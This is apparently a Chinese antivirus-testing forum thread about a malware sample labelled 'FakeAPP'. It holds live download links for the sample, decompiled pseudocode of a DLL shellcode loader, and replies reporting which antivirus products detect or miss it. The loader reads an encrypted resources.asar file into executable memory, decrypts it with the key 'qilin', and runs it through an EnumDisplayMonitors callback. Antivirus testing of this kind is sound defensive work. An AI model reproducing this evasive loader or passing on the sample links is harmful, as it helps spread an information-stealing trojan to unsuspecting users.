FakeAPP 1x

UNknownOoo

https://wormhole.app/E4Y4mR#WEzy_ojU5lyA---SaxdXYA

https://share.weiyun.com/CCBBCbyM

黑dll VT初扫：8/72

1. int UnityOke()
   
2. {
   
3.   HANDLE FileA; // rbx
   
4.   void *v1; // rdi
   
5.   int result; // eax
   
6.   unsigned int v3; // eax
   
7.   char v4[32]; // [rsp+40h] [rbp-148h] BYREF
   
8.   CHAR Dst[272]; // [rsp+60h] [rbp-128h] BYREF
   
9. 
   
10.   ExpandEnvironmentStringsA("%LOCALAPPDATA%\\resources.asar", Dst, 0x104u);
    
11.   FileA = CreateFileA(Dst, 0x80000000, 0, 0i64, 3u, 0, 0i64);
    
12.   if ( FileA == (HANDLE)-1i64 )
    
13.     RaiseException(0xE0000001, 1u, 0, 0i64);
    
14.   GetFileSize(FileA, 0i64);
    
15.   v1 = VirtualAlloc(0i64, 0x100000ui64, 0x1000u, 0x40u);
    
16.   result = ReadFile(FileA, v1, 0x100000u, 0i64, 0i64);
    
17.   if ( result )
    
18.   {
    
19.     result = CloseHandle(FileA);
    
20.     if ( v1 )
    
21.     {
    
22.       v3 = strlen("qilin");
    
23.       sub_1800013D8(v4, "qilin", v3);
    
24.       sub_1800018D8(v4, v1, 0x100000i64);
    
25.       EnumDisplayMonitors(0i64, 0i64, (MONITORENUMPROC)v1, 0i64);
    
26.       return sub_18000180C(v4);
    
27.     }
    
28.   }
    
29.   return result;
    
30. }

复制代码

post88

ESET MISSED

微微的笑

avast miss 。

莒县小哥

Rukia

hallclient.exe. 威胁名称: ATC.Generic.Shellcode.Loader.Marte.X.ECF46EF4.

awsl10000次

https://opentip.kaspersky.com/E8 ... /results?tab=upload
op clean（未上报）

superLYT

BD双击ATD

asdfnbbj

360报毒

成顔

过卡巴扫描，双击无反应，之后cmd疯狂闪烁。快速扫描未发现威胁。重启后快速扫描发现，选择不重启清除进程hallclient.exe会在后台进程中被杀但文件还在，手动扫描这三个文件不报。

aboringman

ESET：0

运行，跟其他人一样也是疯狂弹CMD窗口，消停之后手动触发白加黑，得

1. 2025/11/21 22:23:33;高级内存扫描程序;文件;系统内存 > hallclient.exe(11004);Win64/Spy.Agent.GF 特洛伊木马 的变量;已包含被感染的文件 (下次重新启动后);;AE03DDB810E062333006ED4473802110EB1750C5;;

复制代码

but......